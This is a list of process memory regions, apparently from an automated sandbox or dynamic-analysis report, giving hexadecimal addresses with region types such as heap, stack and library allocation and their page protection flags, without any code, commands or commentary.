page read and write
|
||
1E6B000
|
heap
|
page read and write
|
||
171000
|
heap
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
35B0000
|
heap
|
page read and write
|
||
4E7000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
177000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
1A998000
|
stack
|
page read and write
|
||
23EE000
|
trusted library allocation
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
1E43000
|
direct allocation
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
13C000
|
stack
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
1A86E000
|
heap
|
page execute and read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
1D05E000
|
trusted library section
|
page read and write
|
||
4911000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
35F000
|
trusted library allocation
|
page read and write
|
||
1CCAE000
|
trusted library section
|
page read and write
|
||
27EE000
|
trusted library allocation
|
page read and write
|
||
1C1B5000
|
heap
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
179000
|
heap
|
page read and write
|
||
1CCFF000
|
trusted library section
|
page read and write
|
||
1CF97000
|
trusted library section
|
page read and write
|
||
319A000
|
stack
|
page read and write
|
||
1CE7000
|
direct allocation
|
page read and write
|
||
4400000
|
heap
|
page read and write
|
||
32D9000
|
heap
|
page read and write
|
||
1A7000
|
heap
|
page read and write
|
||
1CE97000
|
trusted library section
|
page read and write
|
||
1CFDD000
|
trusted library section
|
page read and write
|
||
3FF7000
|
heap
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page read and write
|
||
2D8A000
|
trusted library allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
1C2BA000
|
stack
|
page read and write
|
||
7FE8994C000
|
trusted library allocation
|
page execute and read and write
|
||
1CFD000
|
direct allocation
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
4746000
|
heap
|
page read and write
|
||
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
509000
|
heap
|
page read and write
|
||
1D3000
|
stack
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
32BC000
|
heap
|
page read and write
|
||
47F0000
|
heap
|
page read and write
|
||
1CCBC000
|
trusted library section
|
page read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1E0000
|
trusted library allocation
|
page read and write
|
||
1C3EF000
|
stack
|
page read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
7FE89956000
|
trusted library allocation
|
page read and write
|
||
2A2000
|
heap
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
4FA000
|
heap
|
page read and write
|
||
4EF000
|
heap
|
page read and write
|
||
2BE000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
1F90000
|
heap
|
page read and write
|
||
1A8B8000
|
stack
|
page read and write
|
||
3F9000
|
heap
|
page read and write
|
||
7FE89A78000
|
trusted library allocation
|
page read and write
|
||
130000
|
trusted library allocation
|
page read and write
|
||
2763000
|
trusted library allocation
|
page read and write
|
||
509000
|
heap
|
page read and write
|
||
3940000
|
trusted library allocation
|
page read and write
|
||
1AA88000
|
stack
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
1A578000
|
heap
|
page execute and read and write
|
||
1CE8F000
|
trusted library section
|
page read and write
|
||
405D000
|
heap
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
1AC2E000
|
heap
|
page read and write
|
||
14A69000
|
trusted library allocation
|
page read and write
|
||
7FE89A32000
|
trusted library allocation
|
page read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
1AE0F000
|
stack
|
page read and write
|
||
24D1000
|
trusted library allocation
|
page read and write
|
||
476B000
|
heap
|
page read and write
|
||
3FB7000
|
heap
|
page read and write
|
||
1B196000
|
heap
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
179000
|
heap
|
page read and write
|
||
21AE000
|
stack
|
page read and write | page guard
|
||
2129000
|
trusted library allocation
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
2300000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
1AD50000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
2772000
|
trusted library allocation
|
page read and write
|
||
13B000
|
heap
|
page read and write
|
||
5E4000
|
heap
|
page read and write
|
||
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
24D1000
|
trusted library allocation
|
page read and write
|
||
5AC000
|
heap
|
page read and write
|
||
2540000
|
heap
|
page execute and read and write
|
||
453A000
|
heap
|
page read and write
|
||
2793000
|
trusted library allocation
|
page read and write
|
||
1B3A0000
|
heap
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
163000
|
stack
|
page read and write
|
||
1AAB9000
|
heap
|
page read and write
|
||
1CD2B000
|
trusted library section
|
page read and write
|
||
32D6000
|
heap
|
page read and write
|
||
1B47F000
|
stack
|
page read and write
|
||
7FE89A4C000
|
trusted library allocation
|
page read and write
|
||
1C00000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
2000000
|
heap
|
page read and write
|
||
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
2FDB000
|
heap
|
page read and write
|
||
C0000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2C3000
|
stack
|
page read and write
|
||
4168000
|
heap
|
page read and write
|
||
338D000
|
trusted library allocation
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
453000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
76A000
|
heap
|
page read and write
|
||
2770000
|
trusted library allocation
|
page read and write
|
||
1CE31000
|
trusted library section
|
page read and write
|
||
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
1C5FE000
|
stack
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
1B4B0000
|
heap
|
page read and write
|
||
1C2B0000
|
heap
|
page read and write
|
||
2997000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page execute and read and write
|
||
27D000
|
heap
|
page read and write
|
||
1CED0000
|
trusted library section
|
page read and write
|
||
1CE37000
|
trusted library section
|
page read and write
|
||
1A239000
|
heap
|
page read and write
|
||
4750000
|
heap
|
page read and write
|
||
36C000
|
stack
|
page read and write
|
||
18C000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
514000
|
heap
|
page read and write
|
||
122A1000
|
trusted library allocation
|
page read and write
|
||
1B5BC000
|
stack
|
page read and write
|
||
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
3FD000
|
heap
|
page read and write
|
||
3CA000
|
heap
|
page read and write
|
||
3007000
|
heap
|
page read and write
|
||
1E0000
|
trusted library allocation
|
page read and write
|
||
1C2C0000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
1C2D3000
|
heap
|
page read and write
|
||
347000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
258000
|
heap
|
page read and write
|
||
23FD000
|
trusted library allocation
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
1CF8D000
|
trusted library section
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
4C3000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
1E0D000
|
stack
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page read and write
|
||
7FE89A27000
|
trusted library allocation
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
4C9000
|
heap
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
2E5E000
|
stack
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
26000
|
heap
|
page read and write
|
||
1B1B4000
|
heap
|
page read and write
|
||
52D000
|
heap
|
page read and write
|
||
49D3000
|
heap
|
page read and write
|
||
46C0000
|
heap
|
page read and write
|
||
1D016000
|
trusted library section
|
page read and write
|
||
226000
|
stack
|
page read and write
|
||
37A0000
|
heap
|
page read and write
|
||
4A65000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
12D000
|
heap
|
page read and write
|
||
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89BA7000
|
trusted library allocation
|
page read and write
|
||
23FC000
|
trusted library allocation
|
page read and write
|
||
21B000
|
stack
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
4516000
|
heap
|
page read and write
|
||
1CD01000
|
trusted library section
|
page read and write
|
||
3661000
|
heap
|
page read and write
|
||
1D26000
|
heap
|
page read and write
|
||
43A8000
|
heap
|
page read and write
|
||
1AE40000
|
heap
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
2DD000
|
heap
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
1CDE4000
|
trusted library section
|
page read and write
|
||
1CA3000
|
direct allocation
|
page read and write
|
||
241E000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1CA2F000
|
stack
|
page read and write
|
||
21E9000
|
trusted library allocation
|
page read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
1CE77000
|
trusted library section
|
page read and write
|
||
3660000
|
heap
|
page read and write
|
||
1E50000
|
heap
|
page read and write
|
||
14B000
|
heap
|
page read and write
|
||
509000
|
heap
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
1AB51000
|
heap
|
page read and write
|
||
5AD000
|
heap
|
page read and write
|
||
2F71000
|
heap
|
page read and write
|
||
3F8E000
|
stack
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
49D1000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
F90000
|
heap
|
page read and write
|
||
5AC000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1CFAC000
|
trusted library section
|
page read and write
|
||
2DB000
|
stack
|
page read and write
|
||
331000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
32B000
|
heap
|
page read and write
|
||
B2E000
|
stack
|
page read and write
|
||
31E000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
14BAB000
|
trusted library allocation
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
1B360000
|
heap
|
page read and write
|
||
474000
|
heap
|
page read and write
|
||
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
D0000
|
heap
|
page read and write
|
||
4EE000
|
heap
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
4661000
|
heap
|
page read and write
|
||
1C3A5000
|
heap
|
page read and write
|
||
46CA000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
137ED000
|
trusted library allocation
|
page read and write
|
||
1E37000
|
direct allocation
|
page read and write
|
||
3AF000
|
heap
|
page read and write
|
||
37C000
|
heap
|
page read and write
|
||
17C000
|
heap
|
page read and write
|
||
225F000
|
stack
|
page read and write
|
||
177000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
1AD4C000
|
heap
|
page read and write
|
||
4A3B000
|
heap
|
page read and write
|
||
241A000
|
heap
|
page read and write
|
||
4714000
|
heap
|
page read and write
|
||
26D2000
|
trusted library allocation
|
page read and write
|
||
1CE0000
|
direct allocation
|
page read and write
|
||
3AC0000
|
trusted library allocation
|
page read and write
|
||
7FE89A43000
|
trusted library allocation
|
page read and write
|
||
7FE89873000
|
trusted library allocation
|
page execute and read and write
|
||
47A1000
|
heap
|
page read and write
|
||
10000000
|
direct allocation
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
7FE89883000
|
trusted library allocation
|
page read and write
|
||
1D029000
|
trusted library section
|
page read and write
|
||
2591000
|
trusted library allocation
|
page read and write
|
||
7FE89874000
|
trusted library allocation
|
page read and write
|
||
1CF45000
|
trusted library section
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
278E000
|
trusted library allocation
|
page read and write
|
||
1CF23000
|
trusted library section
|
page read and write
|
||
24A0000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1E35000
|
heap
|
page read and write
|
||
1AACE000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
1CF8B000
|
trusted library section
|
page read and write
|
||
7FE89A30000
|
trusted library allocation
|
page execute and read and write
|
||
1AE3F000
|
stack
|
page read and write
|
||
232000
|
stack
|
page read and write
|
||
1CE0C000
|
trusted library section
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2832000
|
trusted library allocation
|
page read and write
|
||
2993000
|
trusted library allocation
|
page read and write
|
||
1C84F000
|
stack
|
page read and write
|
||
1A74B000
|
heap
|
page read and write
|
||
1CE0000
|
heap
|
page read and write
|
||
4A3E000
|
heap
|
page read and write
|
||
441C000
|
heap
|
page read and write
|
||
178000
|
heap
|
page read and write
|
||
110000
|
heap
|
page read and write
|
||
1C2C4000
|
heap
|
page read and write
|
||
596000
|
heap
|
page read and write
|
||
30000
|
heap
|
page read and write
|
||
2EC000
|
heap
|
page read and write
|
||
1A6F0000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
51E000
|
stack
|
page read and write
|
||
21EB000
|
trusted library allocation
|
page read and write
|
||
40AE000
|
heap
|
page read and write
|
||
1EB0000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
1C359000
|
heap
|
page read and write
|
||
15C000
|
heap
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
12A5E000
|
trusted library allocation
|
page read and write
|
||
18D000
|
heap
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
3B74000
|
trusted library allocation
|
page read and write
|
||
114000
|
heap
|
page read and write
|
||
4A65000
|
heap
|
page read and write
|
||
2767000
|
trusted library allocation
|
page read and write
|
||
24C000
|
heap
|
page read and write
|
||
1CEE6000
|
trusted library section
|
page read and write
|
||
149000
|
heap
|
page read and write
|
||
22D3000
|
trusted library allocation
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
2EE000
|
heap
|
page read and write
|
||
5A5000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
47F000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
7FE89A98000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
21E7000
|
trusted library allocation
|
page read and write
|
||
24CE000
|
stack
|
page read and write | page guard
|
||
132000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
279C000
|
trusted library allocation
|
page read and write
|
||
1CBF000
|
direct allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
1E50000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
1B134000
|
heap
|
page read and write
|
||
4618000
|
heap
|
page read and write
|
||
2E52000
|
trusted library allocation
|
page read and write
|
||
137000
|
heap
|
page read and write
|
||
2EA9000
|
trusted library allocation
|
page read and write
|
||
334000
|
heap
|
page read and write
|
||
1C158000
|
heap
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
149000
|
heap
|
page read and write
|
||
255000
|
heap
|
page read and write
|
||
49B000
|
heap
|
page read and write
|
||
4399000
|
heap
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
33AF000
|
heap
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
188000
|
heap
|
page read and write
|
||
7FE8989D000
|
trusted library allocation
|
page execute and read and write
|
||
2774000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
27D3000
|
trusted library allocation
|
page read and write
|
||
4B4000
|
heap
|
page read and write
|
||
2F8C000
|
heap
|
page read and write
|
||
2410000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
4A06000
|
heap
|
page read and write
|
||
1B060000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page execute and read and write
|
||
2792000
|
trusted library allocation
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
2F1C000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
2C6E000
|
stack
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1CBB000
|
direct allocation
|
page read and write
|
||
48E1000
|
heap
|
page read and write
|
||
1CE23000
|
trusted library section
|
page read and write
|
||
225E000
|
stack
|
page read and write | page guard
|
||
3B6F000
|
trusted library allocation
|
page read and write
|
||
289000
|
heap
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
2F6000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
4C4000
|
heap
|
page read and write
|
||
4719000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
7FE8992C000
|
trusted library allocation
|
page execute and read and write
|
||
21ED000
|
trusted library allocation
|
page read and write
|
||
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
1C03F000
|
stack
|
page read and write
|
||
CB8000
|
heap
|
page read and write
|
||
1CFC5000
|
trusted library section
|
page read and write
|
||
4AD000
|
heap
|
page read and write
|
||
50C000
|
heap
|
page read and write
|
||
4DA000
|
heap
|
page read and write
|
||
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
3ABF000
|
stack
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page read and write
|
||
2796000
|
trusted library allocation
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
279A000
|
trusted library allocation
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page read and write
|
||
1A60E000
|
stack
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
3C3000
|
heap
|
page read and write
|
||
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
1CFEB000
|
trusted library section
|
page read and write
|
||
23E8000
|
trusted library allocation
|
page read and write
|
||
453F000
|
heap
|
page read and write
|
||
32BD000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
476B000
|
heap
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
279A000
|
trusted library allocation
|
page read and write
|
||
1CD9B000
|
trusted library section
|
page read and write
|
||
1A75E000
|
heap
|
page execute and read and write
|
||
441C000
|
heap
|
page read and write
|
||
3490000
|
trusted library allocation
|
page read and write
|
||
23E5000
|
trusted library allocation
|
page read and write
|
||
45E1000
|
heap
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
29CC000
|
trusted library allocation
|
page read and write
|
||
4C45000
|
heap
|
page read and write
|
||
474000
|
heap
|
page read and write
|
||
49D7000
|
heap
|
page read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
3700000
|
trusted library allocation
|
page read and write
|
||
2777000
|
trusted library allocation
|
page read and write
|
||
110000
|
heap
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
4A22000
|
heap
|
page read and write
|
||
144000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
1CD05000
|
trusted library section
|
page read and write
|
||
34AD000
|
trusted library allocation
|
page read and write
|
||
2160000
|
heap
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
2F24000
|
heap
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
18C000
|
stack
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3710000
|
heap
|
page read and write
|
||
2788000
|
trusted library allocation
|
page read and write
|
||
4DF000
|
heap
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
43A8000
|
heap
|
page read and write
|
||
1BD6000
|
heap
|
page read and write
|
||
1CFDF000
|
trusted library section
|
page read and write
|
||
286000
|
heap
|
page read and write
|
||
14CED000
|
trusted library allocation
|
page read and write
|
||
343000
|
heap
|
page read and write
|
||
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
1CE2D000
|
trusted library section
|
page read and write
|
||
1BA0000
|
heap
|
page read and write
|
||
1B355000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1CDFB000
|
trusted library section
|
page read and write
|
||
1AFF6000
|
heap
|
page read and write
|
||
BCC000
|
stack
|
page read and write
|
||
334000
|
heap
|
page read and write
|
||
5AD000
|
heap
|
page read and write
|
||
4A22000
|
heap
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
52D000
|
heap
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
1D40000
|
direct allocation
|
page read and write
|
||
2885000
|
trusted library allocation
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
17D000
|
heap
|
page read and write
|
||
541000
|
heap
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
1CD2F000
|
trusted library section
|
page read and write
|
||
2FE2000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
4A22000
|
heap
|
page read and write
|
||
1B54E000
|
stack
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
340000
|
heap
|
page read and write
|
||
1A570000
|
heap
|
page execute and read and write
|
||
120D1000
|
trusted library allocation
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
2765000
|
trusted library allocation
|
page read and write
|
||
7FE89892000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
25E000
|
heap
|
page read and write
|
||
4D1000
|
heap
|
page read and write
|
||
3F71000
|
heap
|
page read and write
|
||
46C3000
|
heap
|
page read and write
|
||
4403000
|
heap
|
page read and write
|
||
22F000
|
stack
|
page read and write
|
||
288B000
|
trusted library allocation
|
page read and write
|
||
1ACC8000
|
heap
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
56F000
|
heap
|
page read and write
|
||
2916000
|
trusted library allocation
|
page read and write
|
||
1295E000
|
trusted library allocation
|
page read and write
|
||
1CD07000
|
trusted library section
|
page read and write
|
||
2772000
|
trusted library allocation
|
page read and write
|
||
1FF000
|
heap
|
page read and write
|
||
121E1000
|
trusted library allocation
|
page read and write
|
||
56E000
|
heap
|
page read and write
|
||
1C36000
|
heap
|
page read and write
|
||
4A3B000
|
heap
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
21E9000
|
trusted library allocation
|
page read and write
|
||
4BA000
|
heap
|
page read and write
|
||
2527000
|
trusted library allocation
|
page read and write
|
||
2785000
|
trusted library allocation
|
page read and write
|
||
7FE898AB000
|
trusted library allocation
|
page read and write
|
||
12101000
|
trusted library allocation
|
page read and write
|
||
1CCBE000
|
trusted library section
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
297D000
|
trusted library allocation
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
CAF000
|
stack
|
page read and write
|
||
1CA0000
|
direct allocation
|
page read and write
|
||
1C60000
|
direct allocation
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
3D90000
|
heap
|
page read and write
|
||
1298E000
|
trusted library allocation
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
3344000
|
heap
|
page read and write
|
||
59E000
|
heap
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
25E000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
1CF12000
|
trusted library section
|
page read and write
|
||
1AD2F000
|
heap
|
page read and write
|
||
1C600000
|
heap
|
page read and write
|
||
2512000
|
trusted library allocation
|
page read and write
|
||
1CFC9000
|
trusted library section
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
24DB000
|
heap
|
page read and write
|
||
279A000
|
trusted library allocation
|
page read and write
|
||
4166000
|
heap
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
3D72000
|
trusted library allocation
|
page read and write
|
||
3B69000
|
trusted library allocation
|
page read and write
|
||
2FF000
|
heap
|
page read and write
|
||
1CE9B000
|
trusted library section
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
694000
|
heap
|
page read and write
|
||
5E8000
|
heap
|
page read and write
|
||
3010000
|
trusted library allocation
|
page read and write
|
||
1CDB8000
|
trusted library section
|
page read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
CD6000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1D20000
|
direct allocation
|
page read and write
|
||
1CD53000
|
trusted library section
|
page read and write
|
||
2D9000
|
heap
|
page read and write
|
||
4D7000
|
heap
|
page read and write
|
||
28A3000
|
trusted library allocation
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
4167000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
224F000
|
stack
|
page read and write
|
||
233000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
4715000
|
heap
|
page read and write
|
||
2BBE000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
1C2F5000
|
heap
|
page read and write
|
||
10016000
|
direct allocation
|
page execute and read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
341000
|
heap
|
page read and write
|
||
1ACC1000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
E0000
|
heap
|
page read and write
|
||
1CDE8000
|
trusted library section
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
1E70000
|
heap
|
page read and write
|
||
26D2000
|
trusted library allocation
|
page read and write
|
||
2B6000
|
heap
|
page read and write
|
||
439F000
|
heap
|
page read and write
|
||
49D1000
|
heap
|
page read and write
|
||
3C78000
|
heap
|
page read and write
|
||
316000
|
heap
|
page read and write
|
||
1CF9B000
|
trusted library section
|
page read and write
|
||
2FE7000
|
heap
|
page read and write
|
||
47ED000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
1A3DD000
|
stack
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
32E1000
|
heap
|
page read and write
|
||
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
1A7B0000
|
heap
|
page execute and read and write
|
||
360000
|
heap
|
page read and write
|
||
1D034000
|
trusted library section
|
page read and write
|
||
1C3D7000
|
heap
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
529000
|
heap
|
page read and write
|
||
23EA000
|
trusted library allocation
|
page read and write
|
||
1F06000
|
heap
|
page read and write
|
||
2A13000
|
trusted library allocation
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
46C2000
|
heap
|
page read and write
|
||
